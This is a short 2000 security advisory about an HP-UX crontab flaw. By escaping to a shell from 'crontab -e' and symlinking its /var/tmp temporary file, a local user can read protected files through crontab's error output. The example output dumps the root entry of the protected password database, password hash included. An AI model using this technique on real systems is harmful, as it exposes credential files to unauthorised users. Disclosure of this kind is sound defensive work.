HP-UX crontab temporary file symbolic link vulnerability
24 Oct. 2000
Summary
There is a vulnerability in crontab which allows users to read arbitrary local files without attaining root or file ownership privileges.
Note that not all local users can use crontab, but rather only those who are registered in crontab.allow file.
Credit:
The information has been provided by Kyong-won Cho.
Using the crontab command with the -e option (crontab -e) executes the vi editor and a temporary file is created in /var/tmp/ . The owner of the file is a current user.
The attack is performed by exiting to a subshell using the '!sh' command in vi, linking the file created in /var/tmp/ and then exiting crontab. The error message appears with all the file names and details.
Example:
To display the contents of /tcb/files/auth/r/root
$ id
uid=101(dubhe) gid=101(swat)
$ uname -s -r
HP-UX B.11.00
root:u_name=root:u_id#0:\
crontab: error on previous line; unexpected character found in line.
:u_pwd=Of2wgf6SCoIbQ:\
crontab: error on previous line; unexpected character found in line.
:u_bootauth:u_auditid#0:\
crontab: error on previous line; unexpected character found in line.
:u_auditflag#1:\
crontab: error on previous line; unexpected character found in line.
:u_pswduser=root:u_suclog#972084495:u_unsuclog#972084492:u_lock@:\
crontab: error on previous line; unexpected character found in line.
:chkent:
crontab: error on previous line; unexpected character found in line.
